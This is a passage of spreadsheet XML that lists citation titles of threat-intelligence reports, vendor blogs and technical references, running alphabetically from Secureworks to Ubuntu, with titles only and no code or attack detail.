  </si>
  <si>
    <t>Secureworks MCMD July 2019</t>
  </si>
  <si>
    <t>Secureworks NICKEL ACADEMY Dec 2017</t>
  </si>
  <si>
    <t>Secureworks NotPetya June 2017</t>
  </si>
  <si>
    <t>Secureworks REvil September 2019</t>
  </si>
  <si>
    <t>Securing bash history</t>
  </si>
  <si>
    <t>Security Affairs DustSquad Oct 2018</t>
  </si>
  <si>
    <t>Security Affairs Elderwood Sept 2012</t>
  </si>
  <si>
    <t>Security Affairs SILENTTRINITY July 2019</t>
  </si>
  <si>
    <t>Security Boulevard Egregor Oct 2020</t>
  </si>
  <si>
    <t>Security Intelligence ITG08 April 2020</t>
  </si>
  <si>
    <t>Security Intelligence More Eggs Aug 2019</t>
  </si>
  <si>
    <t>SecurityTrails Google Hacking</t>
  </si>
  <si>
    <t>SecurityWeek Nomadic Octopus Oct 2018</t>
  </si>
  <si>
    <t>Sednit</t>
  </si>
  <si>
    <t>Sekoia HideDRV Oct 2016</t>
  </si>
  <si>
    <t>SensePost MacroLess DDE Oct 2017</t>
  </si>
  <si>
    <t>SensePost NotRuler</t>
  </si>
  <si>
    <t>SensePost Outlook Forms</t>
  </si>
  <si>
    <t>SensePost Outlook Home Page</t>
  </si>
  <si>
    <t>SensePost PS DDE May 2016</t>
  </si>
  <si>
    <t>SensePost Ruler GitHub</t>
  </si>
  <si>
    <t>Sentinel Labs</t>
  </si>
  <si>
    <t>Sentinel Labs WastedLocker July 2020</t>
  </si>
  <si>
    <t>SentinelLabs Agent Tesla Aug 2020</t>
  </si>
  <si>
    <t>SentinelLabs reversing run-only applescripts 2021</t>
  </si>
  <si>
    <t>SentinelOne Aoqin Dragon June 2022</t>
  </si>
  <si>
    <t>SentinelOne AppleScript</t>
  </si>
  <si>
    <t>SentinelOne EvilQuest Ransomware Spyware 2020</t>
  </si>
  <si>
    <t>SentinelOne FrameworkPOS September 2019</t>
  </si>
  <si>
    <t>SentinelOne Hermetic Wiper February 2022</t>
  </si>
  <si>
    <t>SentinelOne Lazarus macOS July 2020</t>
  </si>
  <si>
    <t>SentinelOne MacMa Nov 2021</t>
  </si>
  <si>
    <t>SentinelOne NobleBaron June 2021</t>
  </si>
  <si>
    <t>SentinelOne Valak June 2020</t>
  </si>
  <si>
    <t>SentinelOne macOS Red Team</t>
  </si>
  <si>
    <t>Seqrite DoubleExtension</t>
  </si>
  <si>
    <t>Shadowbunny VM Defense Evasion</t>
  </si>
  <si>
    <t>Shadowserver Strategic Web Compromise</t>
  </si>
  <si>
    <t>Sharepoint Sharing Events</t>
  </si>
  <si>
    <t>Shlayer jamf gatekeeper bypass 2021</t>
  </si>
  <si>
    <t>Shodan</t>
  </si>
  <si>
    <t xml:space="preserve">Shortcut for Persistence </t>
  </si>
  <si>
    <t>SigmaHQ</t>
  </si>
  <si>
    <t>SilentBreak Offensive PS Dec 2015</t>
  </si>
  <si>
    <t>SilentBreak Outlook Rules</t>
  </si>
  <si>
    <t>SingHealth Breach Jan 2019</t>
  </si>
  <si>
    <t>Sixdub PowerPick Jan 2016</t>
  </si>
  <si>
    <t>Slideshare Abusing SSH</t>
  </si>
  <si>
    <t>SmartMontools</t>
  </si>
  <si>
    <t>Sofacy</t>
  </si>
  <si>
    <t>Sofacy DealersChoice</t>
  </si>
  <si>
    <t>Sofacy Komplex Trojan</t>
  </si>
  <si>
    <t>Softpedia MinerC</t>
  </si>
  <si>
    <t>Sogeti CERT ESEC Babuk March 2021</t>
  </si>
  <si>
    <t>SolarWinds Advisory Dec 2020</t>
  </si>
  <si>
    <t>SolarWinds Sunburst Sunspot Update January 2021</t>
  </si>
  <si>
    <t>Sophos Attachment</t>
  </si>
  <si>
    <t>Sophos Dyreza April 2015</t>
  </si>
  <si>
    <t>Sophos Emotet Apr 2019</t>
  </si>
  <si>
    <t>Sophos Geolocation 2016</t>
  </si>
  <si>
    <t>Sophos Gootloader</t>
  </si>
  <si>
    <t>Sophos Maze VM September 2020</t>
  </si>
  <si>
    <t>Sophos Netwalker May 2020</t>
  </si>
  <si>
    <t>Sophos New Ryuk Attack October 2020</t>
  </si>
  <si>
    <t>Sophos PowerShell Command History Forensics</t>
  </si>
  <si>
    <t>Sophos PowerShell command audit</t>
  </si>
  <si>
    <t>Sophos Ragnar May 2020</t>
  </si>
  <si>
    <t>Sophos SamSam Apr 2018</t>
  </si>
  <si>
    <t>Sophos Snatch Ransomware 2019</t>
  </si>
  <si>
    <t>Sophos ZeroAccess</t>
  </si>
  <si>
    <t>SourceForge rkhunter</t>
  </si>
  <si>
    <t>Sourceforge Heyoka 2022</t>
  </si>
  <si>
    <t>Specter Ops - Cloud Credential Storage</t>
  </si>
  <si>
    <t>SpecterOps AWS Traffic Mirroring</t>
  </si>
  <si>
    <t>SpecterOps Azure Privilege Escalation</t>
  </si>
  <si>
    <t>SpecterOps Certified Pre Owned</t>
  </si>
  <si>
    <t>SpecterOps JXA 2020</t>
  </si>
  <si>
    <t>SpectorOps Bifrost Kerberos macOS 2019</t>
  </si>
  <si>
    <t>SpectorOps Code Signing Dec 2017</t>
  </si>
  <si>
    <t>SpectorOps Hiding Reg Jul 2017</t>
  </si>
  <si>
    <t>SpectorOps Host-Based Jul 2017</t>
  </si>
  <si>
    <t>SpectorOps Subverting Trust Sept 2017</t>
  </si>
  <si>
    <t>Splunk Kovar Certificates 2017</t>
  </si>
  <si>
    <t>Splunk Supernova Jan 2021</t>
  </si>
  <si>
    <t>Spoofing credential dialogs</t>
  </si>
  <si>
    <t>Spring Dragon Jun 2015</t>
  </si>
  <si>
    <t>Staaldraad Phishing with OAuth 2017</t>
  </si>
  <si>
    <t>StackExchange Hooks Jul 2012</t>
  </si>
  <si>
    <t>Stantinko Botnet</t>
  </si>
  <si>
    <t>Startup Items Eclectic</t>
  </si>
  <si>
    <t>Stealthbits Cracking AS-REP Roasting Jun 2019</t>
  </si>
  <si>
    <t>Stealthbits Detect PtT 2019</t>
  </si>
  <si>
    <t>Stealthbits Overpass-the-Hash</t>
  </si>
  <si>
    <t>Sternsecurity LLMNR-NBTNS</t>
  </si>
  <si>
    <t>Stewart 2014</t>
  </si>
  <si>
    <t>Stopping CloudTrail from Sending Events to CloudWatch Logs</t>
  </si>
  <si>
    <t>Stuart ELF Memory</t>
  </si>
  <si>
    <t>Sucuri BIND9 August 2015</t>
  </si>
  <si>
    <t>Summit Route Malicious AMIs</t>
  </si>
  <si>
    <t>Superuser Linux Password Policies</t>
  </si>
  <si>
    <t>Suspected Russian Activity Targeting Government and Business Entities Around the Globe</t>
  </si>
  <si>
    <t>Sygnia Golden SAML</t>
  </si>
  <si>
    <t>Symantec ADS May 2009</t>
  </si>
  <si>
    <t>Symantec APT28 Oct 2018</t>
  </si>
  <si>
    <t>Symantec Attacks Against Government Sector</t>
  </si>
  <si>
    <t>Symantec BITS May 2007</t>
  </si>
  <si>
    <t>Symantec Backdoor.Mivast</t>
  </si>
  <si>
    <t>Symantec Backdoor.Nidiran</t>
  </si>
  <si>
    <t>Symantec Beetlejuice</t>
  </si>
  <si>
    <t>Symantec Black Vine</t>
  </si>
  <si>
    <t>Symantec Briba May 2012</t>
  </si>
  <si>
    <t>Symantec Buckeye</t>
  </si>
  <si>
    <t>Symantec Bumblebee June 2022</t>
  </si>
  <si>
    <t>Symantec Calisto July 2018</t>
  </si>
  <si>
    <t>Symantec Catchamas April 2018</t>
  </si>
  <si>
    <t>Symantec Chafer Dec 2015</t>
  </si>
  <si>
    <t>Symantec Chafer February 2018</t>
  </si>
  <si>
    <t>Symantec Chernobyl W95.CIH</t>
  </si>
  <si>
    <t>Symantec Cicada November 2020</t>
  </si>
  <si>
    <t>Symantec DDoS October 2014</t>
  </si>
  <si>
    <t>Symantec Darkmoon Aug 2005</t>
  </si>
  <si>
    <t>Symantec Darkmoon Sept 2014</t>
  </si>
  <si>
    <t>Symantec Digital Certificates</t>
  </si>
  <si>
    <t>Symantec Dragonfly</t>
  </si>
  <si>
    <t>Symantec Dragonfly 2.0 October 2017</t>
  </si>
  <si>
    <t>Symantec Dragonfly Sept 2017</t>
  </si>
  <si>
    <t>Symantec Dyre June 2015</t>
  </si>
  <si>
    <t>Symantec Elderwood Sept 2012</t>
  </si>
  <si>
    <t>Symantec Elfin Mar 2019</t>
  </si>
  <si>
    <t>Symantec Emotet Jul 2018</t>
  </si>
  <si>
    <t>Symantec Frutas Feb 2013</t>
  </si>
  <si>
    <t>Symantec Gallmaker Oct 2018</t>
  </si>
  <si>
    <t>Symantec Hydraq Jan 2010</t>
  </si>
  <si>
    <t>Symantec Hydraq Persistence Jan 2010</t>
  </si>
  <si>
    <t>Symantec Inception Framework March 2018</t>
  </si>
  <si>
    <t>Symantec Leafminer July 2018</t>
  </si>
  <si>
    <t>Symantec Linfo May 2012</t>
  </si>
  <si>
    <t>Symantec Living off the Land</t>
  </si>
  <si>
    <t>Symantec MuddyWater Dec 2018</t>
  </si>
  <si>
    <t>Symantec Naid June 2012</t>
  </si>
  <si>
    <t>Symantec Naid in the Wild June 2012</t>
  </si>
  <si>
    <t>Symantec Nerex May 2012</t>
  </si>
  <si>
    <t>Symantec Orangeworm April 2018</t>
  </si>
  <si>
    <t>Symantec Orangeworm IOCs April 2018</t>
  </si>
  <si>
    <t>Symantec Palmerworm Sep 2020</t>
  </si>
  <si>
    <t>Symantec Pasam May 2012</t>
  </si>
  <si>
    <t>Symantec Patchwork</t>
  </si>
  <si>
    <t>Symantec RAINDROP January 2021</t>
  </si>
  <si>
    <t>Symantec Remsec IOCs</t>
  </si>
  <si>
    <t>Symantec Ristol May 2012</t>
  </si>
  <si>
    <t>Symantec SSH and ssh-agent</t>
  </si>
  <si>
    <t>Symantec SamSam Oct 2018</t>
  </si>
  <si>
    <t>Symantec Seaduke 2015</t>
  </si>
  <si>
    <t>Symantec Security Center Trojan.Kwampirs</t>
  </si>
  <si>
    <t>Symantec Shamoon 2012</t>
  </si>
  <si>
    <t>Symantec Shuckworm January 2022</t>
  </si>
  <si>
    <t>Symantec Sowbug Nov 2017</t>
  </si>
  <si>
    <t>Symantec Strider Blog</t>
  </si>
  <si>
    <t>Symantec Suckfly March 2016</t>
  </si>
  <si>
    <t>Symantec Suckfly May 2016</t>
  </si>
  <si>
    <t>Symantec Sunburst Sending Data January 2021</t>
  </si>
  <si>
    <t>Symantec Thrip June 2018</t>
  </si>
  <si>
    <t>Symantec Tick Apr 2016</t>
  </si>
  <si>
    <t>Symantec Trojan.Hydraq Jan 2010</t>
  </si>
  <si>
    <t>Symantec Ukraine Wipers February 2022</t>
  </si>
  <si>
    <t>Symantec Ushedix June 2008</t>
  </si>
  <si>
    <t>Symantec Vasport May 2012</t>
  </si>
  <si>
    <t>Symantec Volgmer Aug 2014</t>
  </si>
  <si>
    <t>Symantec W.32 Stuxnet Dossier</t>
  </si>
  <si>
    <t>Symantec W32.Duqu</t>
  </si>
  <si>
    <t>Symantec WastedLocker June 2020</t>
  </si>
  <si>
    <t>Symantec Waterbug</t>
  </si>
  <si>
    <t>Symantec Waterbug Jun 2019</t>
  </si>
  <si>
    <t>Symantec Whitefly March 2019</t>
  </si>
  <si>
    <t>Symantec Wiarp May 2012</t>
  </si>
  <si>
    <t>Symantec Windows Rootkits</t>
  </si>
  <si>
    <t>Synack Secure Kernel Extension Broken</t>
  </si>
  <si>
    <t>Syscall 2014</t>
  </si>
  <si>
    <t>Sysdig Kinsing November 2020</t>
  </si>
  <si>
    <t>Sysinternals AppCertDlls Oct 2007</t>
  </si>
  <si>
    <t>Sysmon EID 9</t>
  </si>
  <si>
    <t>System and kernel extensions in macOS</t>
  </si>
  <si>
    <t>Systemd Remote Control</t>
  </si>
  <si>
    <t>Systemd Service Units</t>
  </si>
  <si>
    <t>T1562.002_redcanaryco</t>
  </si>
  <si>
    <t>TCG Trusted Platform Module</t>
  </si>
  <si>
    <t>TEMP.Jumper</t>
  </si>
  <si>
    <t>TEMP.Periscope</t>
  </si>
  <si>
    <t>THE FINANCIAL TIMES LTD 2019.</t>
  </si>
  <si>
    <t>TLDP Shared Libraries</t>
  </si>
  <si>
    <t>Talent-Jump Clambling February 2020</t>
  </si>
  <si>
    <t>Talos Agent Tesla Oct 2018</t>
  </si>
  <si>
    <t>Talos Bisonal 10 Years March 2020</t>
  </si>
  <si>
    <t>Talos Bisonal Mar 2020</t>
  </si>
  <si>
    <t>Talos CCleanup 2017</t>
  </si>
  <si>
    <t>Talos Cobalt Group July 2018</t>
  </si>
  <si>
    <t>Talos Cobalt Strike September 2020</t>
  </si>
  <si>
    <t>Talos DNSpionage Nov 2018</t>
  </si>
  <si>
    <t>Talos Emotet Jan 2019</t>
  </si>
  <si>
    <t>Talos Frankenstein June 2019</t>
  </si>
  <si>
    <t>Talos GravityRAT</t>
  </si>
  <si>
    <t>Talos Group123</t>
  </si>
  <si>
    <t>Talos Kimsuky Nov 2021</t>
  </si>
  <si>
    <t>Talos Konni May 2017</t>
  </si>
  <si>
    <t>Talos Lokibot Jan 2021</t>
  </si>
  <si>
    <t>Talos Micropsia June 2017</t>
  </si>
  <si>
    <t>Talos MuddyWater Jan 2022</t>
  </si>
  <si>
    <t>Talos MuddyWater May 2019</t>
  </si>
  <si>
    <t>Talos NavRAT May 2018</t>
  </si>
  <si>
    <t>Talos Nyetya June 2017</t>
  </si>
  <si>
    <t>Talos Oblique RAT March 2021</t>
  </si>
  <si>
    <t>Talos Olympic Destroyer 2018</t>
  </si>
  <si>
    <t>Talos PoetRAT April 2020</t>
  </si>
  <si>
    <t>Talos PoetRAT October 2020</t>
  </si>
  <si>
    <t>Talos Promethium June 2020</t>
  </si>
  <si>
    <t>Talos ROKRAT</t>
  </si>
  <si>
    <t>Talos ROKRAT 2</t>
  </si>
  <si>
    <t>Talos Remcos Aug 2018</t>
  </si>
  <si>
    <t>Talos Rocke August 2018</t>
  </si>
  <si>
    <t>Talos SamSam Jan 2018</t>
  </si>
  <si>
    <t>Talos Seduploader Oct 2017</t>
  </si>
  <si>
    <t>Talos Smoke Loader July 2018</t>
  </si>
  <si>
    <t>Talos Sodinokibi April 2019</t>
  </si>
  <si>
    <t>Talos Template Injection July 2017</t>
  </si>
  <si>
    <t>Talos TinyTurla September 2021</t>
  </si>
  <si>
    <t>Talos Transparent Tribe May 2021</t>
  </si>
  <si>
    <t>Talos Zeus Panda Nov 2017</t>
  </si>
  <si>
    <t>Talos ZxShell Oct 2014</t>
  </si>
  <si>
    <t>Tarrask scheduled task</t>
  </si>
  <si>
    <t>TeamTNT Cloud Enumeration</t>
  </si>
  <si>
    <t>Tech Republic - Restore AWS Snapshots</t>
  </si>
  <si>
    <t>TechNet Applocker vs SRP</t>
  </si>
  <si>
    <t>TechNet Arp</t>
  </si>
  <si>
    <t>TechNet At</t>
  </si>
  <si>
    <t>TechNet Audit Policy</t>
  </si>
  <si>
    <t>TechNet Autoruns</t>
  </si>
  <si>
    <t>TechNet Blogs Credential Protection</t>
  </si>
  <si>
    <t>TechNet Certutil</t>
  </si>
  <si>
    <t>TechNet Cmd</t>
  </si>
  <si>
    <t>TechNet Copy</t>
  </si>
  <si>
    <t>TechNet Credential Guard</t>
  </si>
  <si>
    <t>TechNet Credential Theft</t>
  </si>
  <si>
    <t>TechNet Del</t>
  </si>
  <si>
    <t>TechNet Dir</t>
  </si>
  <si>
    <t>TechNet Dsquery</t>
  </si>
  <si>
    <t>TechNet Firewall Design</t>
  </si>
  <si>
    <t>TechNet Forum Scheduled Task Operational Setting</t>
  </si>
  <si>
    <t>TechNet Group Policy Basics</t>
  </si>
  <si>
    <t>TechNet How UAC Works</t>
  </si>
  <si>
    <t>TechNet Inside UAC</t>
  </si>
  <si>
    <t>TechNet Ipconfig</t>
  </si>
  <si>
    <t>TechNet Least Privilege</t>
  </si>
  <si>
    <t>TechNet Logon Scripts</t>
  </si>
  <si>
    <t>TechNet Moving Beyond EMET</t>
  </si>
  <si>
    <t>TechNet Nbtstat</t>
  </si>
  <si>
    <t>TechNet Net Time</t>
  </si>
  <si>
    <t>TechNet NetBIOS</t>
  </si>
  <si>
    <t>TechNet Netsh</t>
  </si>
  <si>
    <t>TechNet Netsh Firewall</t>
  </si>
  <si>
    <t>TechNet Netstat</t>
  </si>
  <si>
    <t>TechNet O365 Outlook Rules</t>
  </si>
  <si>
    <t>TechNet Ping</t>
  </si>
  <si>
    <t>TechNet PowerShell</t>
  </si>
  <si>
    <t>TechNet RDP Gateway</t>
  </si>
  <si>
    <t>TechNet RDP NLA</t>
  </si>
  <si>
    <t>TechNet RPC</t>
  </si>
  <si>
    <t>TechNet Remote Desktop Services</t>
  </si>
  <si>
    <t>TechNet Removable Media Control</t>
  </si>
  <si>
    <t>TechNet Route</t>
  </si>
  <si>
    <t>TechNet Scheduled Task Events</t>
  </si>
  <si>
    <t>TechNet Scheduling Priority</t>
  </si>
  <si>
    <t>TechNet Schtasks</t>
  </si>
  <si>
    <t>TechNet Screensaver GP</t>
  </si>
  <si>
    <t>TechNet Secure Boot Process</t>
  </si>
  <si>
    <t>TechNet Server Operator Scheduled Task</t>
  </si>
  <si>
    <t>TechNet Services</t>
  </si>
  <si>
    <t>TechNet Shared Folder</t>
  </si>
  <si>
    <t>TechNet Systeminfo</t>
  </si>
  <si>
    <t>TechNet Task Scheduler Security</t>
  </si>
  <si>
    <t>TechRepublic Wireless GPO FEB 2009</t>
  </si>
  <si>
    <t>Technet MS14-068</t>
  </si>
  <si>
    <t>Technet Net Use</t>
  </si>
  <si>
    <t>Technet Windows Time Service</t>
  </si>
  <si>
    <t>Technospot Chrome Extensions GP</t>
  </si>
  <si>
    <t>Telephone Attack Delivery</t>
  </si>
  <si>
    <t>TempertonDarkHotel</t>
  </si>
  <si>
    <t>Tetra Defense Sodinokibi March 2020</t>
  </si>
  <si>
    <t>The Remote Framebuffer Protocol</t>
  </si>
  <si>
    <t>TheEclecticLightCompany Quarantine and the flag</t>
  </si>
  <si>
    <t xml:space="preserve">TheEclecticLightCompany apple notarization </t>
  </si>
  <si>
    <t>TheEvilBit DYLD_INSERT_LIBRARIES</t>
  </si>
  <si>
    <t>This is Security Command Line Confusion</t>
  </si>
  <si>
    <t>Threat Matrix for Kubernetes</t>
  </si>
  <si>
    <t>ThreatConnect Anthem</t>
  </si>
  <si>
    <t>ThreatConnect Infrastructure Dec 2020</t>
  </si>
  <si>
    <t>ThreatConnect Kimsuky September 2020</t>
  </si>
  <si>
    <t>ThreatExpert Agent.btz</t>
  </si>
  <si>
    <t>ThreatGeek Derusbi Converge</t>
  </si>
  <si>
    <t>ThreatPost Broadvoice Leak</t>
  </si>
  <si>
    <t>ThreatPost Social Media Phishing</t>
  </si>
  <si>
    <t>ThreatStream Evasion Analysis</t>
  </si>
  <si>
    <t>Threatexpress MetaTwin 2017</t>
  </si>
  <si>
    <t>Threatpost Hancitor</t>
  </si>
  <si>
    <t>Threatpost Lizar May 2021</t>
  </si>
  <si>
    <t>Threatpost New Op Sharpshooter Data March 2019</t>
  </si>
  <si>
    <t>Tilbury 2014</t>
  </si>
  <si>
    <t>Tilbury Windows Credentials</t>
  </si>
  <si>
    <t>Timac DYLD_INSERT_LIBRARIES</t>
  </si>
  <si>
    <t>Trap Manual</t>
  </si>
  <si>
    <t>Treasury EvilCorp Dec 2019</t>
  </si>
  <si>
    <t>Treasury North Korean Cyber Groups September 2019</t>
  </si>
  <si>
    <t>Trend Micro</t>
  </si>
  <si>
    <t>Trend Micro APT Attack Tools</t>
  </si>
  <si>
    <t>Trend Micro Banking Malware Jan 2019</t>
  </si>
  <si>
    <t>Trend Micro CPL</t>
  </si>
  <si>
    <t>Trend Micro Carberp February 2014</t>
  </si>
  <si>
    <t>Trend Micro Conficker</t>
  </si>
  <si>
    <t>Trend Micro Cyclops Blink March 2022</t>
  </si>
  <si>
    <t>Trend Micro DRBControl February 2020</t>
  </si>
  <si>
    <t>Trend Micro Daserf Nov 2017</t>
  </si>
  <si>
    <t>Trend Micro Deep Dive Into Defacement</t>
  </si>
  <si>
    <t>Trend Micro Emotet 2020</t>
  </si>
  <si>
    <t>Trend Micro Emotet Jan 2019</t>
  </si>
  <si>
    <t>Trend Micro Exposed Docker APIs</t>
  </si>
  <si>
    <t>Trend Micro Exposed Docker Server</t>
  </si>
  <si>
    <t>Trend Micro FIN6 October 2019</t>
  </si>
  <si>
    <t>Trend Micro HeartBeat Campaign January 2013</t>
  </si>
  <si>
    <t>Trend Micro IXESHE 2012</t>
  </si>
  <si>
    <t>Trend Micro Iron Tiger April 2021</t>
  </si>
  <si>
    <t>Trend Micro KillDisk 1</t>
  </si>
  <si>
    <t>Trend Micro KillDisk 2</t>
  </si>
  <si>
    <t>Trend Micro MacOS Backdoor November 2020</t>
  </si>
  <si>
    <t>Trend Micro Muddy Water March 2021</t>
  </si>
  <si>
    <t>Trend Micro Ngrok September 2020</t>
  </si>
  <si>
    <t>Trend Micro PLEAD RTLO</t>
  </si>
  <si>
    <t>Trend Micro Pawn Storm April 2017</t>
  </si>
  <si>
    <t>Trend Micro Pawn Storm OAuth 2017</t>
  </si>
  <si>
    <t>Trend Micro Privileged Container</t>
  </si>
  <si>
    <t>Trend Micro Qakbot December 2020</t>
  </si>
  <si>
    <t>Trend Micro Qakbot May 2020</t>
  </si>
  <si>
    <t>Trend Micro R980 2016</t>
  </si>
  <si>
    <t>Trend Micro Ransomware February 2021</t>
  </si>
  <si>
    <t>Trend Micro S3 Exposed PII, 2017</t>
  </si>
  <si>
    <t>Trend Micro Skidmap</t>
  </si>
  <si>
    <t>Trend Micro TA505 June 2019</t>
  </si>
  <si>
    <t>Trend Micro TeamTNT</t>
  </si>
  <si>
    <t>Trend Micro Tick November 2019</t>
  </si>
  <si>
    <t>Trend Micro Totbrick Oct 2016</t>
  </si>
  <si>
    <t>Trend Micro Trickbot Nov 2018</t>
  </si>
  <si>
    <t>Trend Micro War of Crypto Miners</t>
  </si>
  <si>
    <t>Trend Micro Waterbear December 2019</t>
  </si>
  <si>
    <t>Trend Micro When Phishing Starts from the Inside 2017</t>
  </si>
  <si>
    <t>Trend Micro Xbash Sept 2018</t>
  </si>
  <si>
    <t>Trend Micro njRAT 2018</t>
  </si>
  <si>
    <t>TrendMicro BKDR_URSNIF.SM</t>
  </si>
  <si>
    <t>TrendMicro BlackTech June 2017</t>
  </si>
  <si>
    <t>TrendMicro CPL Malware Dec 2013</t>
  </si>
  <si>
    <t>TrendMicro CPL Malware Jan 2014</t>
  </si>
  <si>
    <t>TrendMicro Cobalt Group Nov 2017</t>
  </si>
  <si>
    <t>TrendMicro Confucius APT Aug 2021</t>
  </si>
  <si>
    <t>TrendMicro Confucius APT Feb 2018</t>
  </si>
  <si>
    <t>TrendMicro DarkComet Sept 2014</t>
  </si>
  <si>
    <t>TrendMicro EarthLusca 2022</t>
  </si>
  <si>
    <t>TrendMicro Gamaredon April 2020</t>
  </si>
  <si>
    <t>TrendMicro Hacking Team UEFI</t>
  </si>
  <si>
    <t>TrendMicro Lazarus Nov 2018</t>
  </si>
  <si>
    <t>TrendMicro MacOS April 2018</t>
  </si>
  <si>
    <t>TrendMicro Msiexec Feb 2018</t>
  </si>
  <si>
    <t>TrendMicro Netwalker May 2020</t>
  </si>
  <si>
    <t>TrendMicro New Andariel Tactics July 2018</t>
  </si>
  <si>
    <t>TrendMicro Operation Woolen Goldfish March 2015</t>
  </si>
  <si>
    <t>TrendMicro PE_URSNIF.A2</t>
  </si>
  <si>
    <t>TrendMicro POWELIKS AUG 2014</t>
  </si>
  <si>
    <t>TrendMicro POWERSTATS V3 June 2019</t>
  </si>
  <si>
    <t>TrendMicro Patchwork Dec 2017</t>
  </si>
  <si>
    <t>TrendMicro Pawn Storm 2019</t>
  </si>
  <si>
    <t>TrendMicro Pawn Storm Dec 2020</t>
  </si>
  <si>
    <t>TrendMicro RawPOS April 2015</t>
  </si>
  <si>
    <t>TrendMicro Sandworm October 2014</t>
  </si>
  <si>
    <t>TrendMicro Squiblydoo Aug 2017</t>
  </si>
  <si>
    <t>TrendMicro TA505 Aug 2019</t>
  </si>
  <si>
    <t>TrendMicro TROJ-FAKEAV OCT 2012</t>
  </si>
  <si>
    <t>TrendMicro Taidoor</t>
  </si>
  <si>
    <t>TrendMicro Tonto Team October 2020</t>
  </si>
  <si>
    <t>TrendMicro Trickbot Feb 2019</t>
  </si>
  <si>
    <t>TrendMicro Tropic Trooper Mar 2018</t>
  </si>
  <si>
    <t>TrendMicro Tropic Trooper May 2020</t>
  </si>
  <si>
    <t>TrendMicro TropicTrooper 2015</t>
  </si>
  <si>
    <t>TrendMicro Ursnif File Dec 2014</t>
  </si>
  <si>
    <t>TrendMicro Ursnif Mar 2015</t>
  </si>
  <si>
    <t>TrendMicro WindowsAppMac</t>
  </si>
  <si>
    <t>TrendMicro macOS Dacls May 2020</t>
  </si>
  <si>
    <t>TrendMictro Phishing</t>
  </si>
  <si>
    <t>Trendmicro Evolving ThiefQuest 2020</t>
  </si>
  <si>
    <t>Trendmicro NPM Compromise</t>
  </si>
  <si>
    <t>TrendmicroHideoutsLease</t>
  </si>
  <si>
    <t>Trickbot VNC module July 2021</t>
  </si>
  <si>
    <t>Trimarc Detecting Password Spraying</t>
  </si>
  <si>
    <t>Tripwire AppUNBlocker</t>
  </si>
  <si>
    <t>Trojan.Sofacy</t>
  </si>
  <si>
    <t>TrueSec Gsecdump</t>
  </si>
  <si>
    <t>Trusteer Carberp October 2010</t>
  </si>
  <si>
    <t>Trustwave Cherry Picker</t>
  </si>
  <si>
    <t>Trustwave GoldenSpy June 2020</t>
  </si>
  <si>
    <t>Trustwave GoldenSpy2 June 2020</t>
  </si>
  <si>
    <t>Trustwave IIS Module 2013</t>
  </si>
  <si>
    <t>Trustwave Pillowmint June 2020</t>
  </si>
  <si>
    <t>Tsunami</t>
  </si>
  <si>
    <t>Tweet Registry Perms Weakness</t>
  </si>
  <si>
    <t>Twitter CMSTP Jan 2018</t>
  </si>
  <si>
    <t>Twitter CMSTP Usage Jan 2018</t>
  </si>
  <si>
    <t>Twitter Cglyer Status Update APT3 eml</t>
  </si>
  <si>
    <t>Twitter ItsReallyNick APT32 pubprn Masquerade</t>
  </si>
  <si>
    <t>Twitter ItsReallyNick APT41 EK</t>
  </si>
  <si>
    <t>Twitter ItsReallyNick Masquerading Update</t>
  </si>
  <si>
    <t>Twitter ItsReallyNick Platinum Masquerade</t>
  </si>
  <si>
    <t>Twitter ItsReallyNick Status Update APT32 PubPrn</t>
  </si>
  <si>
    <t>Twitter Leoloobeek Scheduled Task</t>
  </si>
  <si>
    <t>Twitter Nick Carr APT10</t>
  </si>
  <si>
    <t>Twitter SquiblyTwo Detection APR 2018</t>
  </si>
  <si>
    <t>UCF STIG Elevation Account Enumeration</t>
  </si>
  <si>
    <t>UCF STIG Symbolic Links</t>
  </si>
  <si>
    <t>UK GOV FSB Factsheet April 2022</t>
  </si>
  <si>
    <t>UK Gov Malign RIS Activity April 2021</t>
  </si>
  <si>
    <t>UK Gov UK Exposes Russia SolarWinds April 2021</t>
  </si>
  <si>
    <t>UK NCSC Olympic Attacks October 2020</t>
  </si>
  <si>
    <t>UK NSCS Russia SolarWinds April 2021</t>
  </si>
  <si>
    <t>UNIT 42 LAPSUS Mar 2022</t>
  </si>
  <si>
    <t>US District Court Indictment GRU Oct 2018</t>
  </si>
  <si>
    <t>US District Court Indictment GRU Unit 74455 October 2020</t>
  </si>
  <si>
    <t>US District Court of DC Phosphorus Complaint 2019</t>
  </si>
  <si>
    <t>US-CERT APT Energy Oct 2017</t>
  </si>
  <si>
    <t>US-CERT Alert TA13-175A Risks of Default Passwords on the Internet</t>
  </si>
  <si>
    <t>US-CERT Alert TA15-314A Web Shells</t>
  </si>
  <si>
    <t>US-CERT BADCALL</t>
  </si>
  <si>
    <t>US-CERT BLINDINGCAN Aug 2020</t>
  </si>
  <si>
    <t>US-CERT Bankshot Dec 2017</t>
  </si>
  <si>
    <t>US-CERT Emotet Jul 2018</t>
  </si>
  <si>
    <t>US-CERT FALLCHILL Nov 2017</t>
  </si>
  <si>
    <t>US-CERT HARDRAIN March 2018</t>
  </si>
  <si>
    <t>US-CERT HIDDEN COBRA June 2017</t>
  </si>
  <si>
    <t>US-CERT HOPLIGHT Apr 2019</t>
  </si>
  <si>
    <t>US-CERT HOTCROISSANT February 2020</t>
  </si>
  <si>
    <t>US-CERT KEYMARBLE Aug 2018</t>
  </si>
  <si>
    <t>US-CERT NotPetya 2017</t>
  </si>
  <si>
    <t>US-CERT Ransomware 2016</t>
  </si>
  <si>
    <t>US-CERT SHARPKNOT June 2018</t>
  </si>
  <si>
    <t>US-CERT SMB Security</t>
  </si>
  <si>
    <t>US-CERT SamSam 2018</t>
  </si>
  <si>
    <t>US-CERT TA17-156A SNMP Abuse 2017</t>
  </si>
  <si>
    <t>US-CERT TA18-068A 2018</t>
  </si>
  <si>
    <t>US-CERT TA18-074A</t>
  </si>
  <si>
    <t>US-CERT TA18-106A Network Infrastructure Devices 2018</t>
  </si>
  <si>
    <t>US-CERT TYPEFRAME June 2018</t>
  </si>
  <si>
    <t>US-CERT Ukraine Feb 2016</t>
  </si>
  <si>
    <t>US-CERT Volgmer 2 Nov 2017</t>
  </si>
  <si>
    <t>US-CERT Volgmer Nov 2017</t>
  </si>
  <si>
    <t>US-CERT WannaCry 2017</t>
  </si>
  <si>
    <t>US-CERT-TA18-106A</t>
  </si>
  <si>
    <t>USCYBERCOM SLOTHFULMEDIA October 2020</t>
  </si>
  <si>
    <t>USDOJ Sandworm Feb 2020</t>
  </si>
  <si>
    <t>USNYAG IranianBotnet March 2016</t>
  </si>
  <si>
    <t>Ubuntu Manpage systemd rc</t>
  </si>
  <si>
    <t>Ubuntu SSSD Docs</t>
  </si>
  <si>
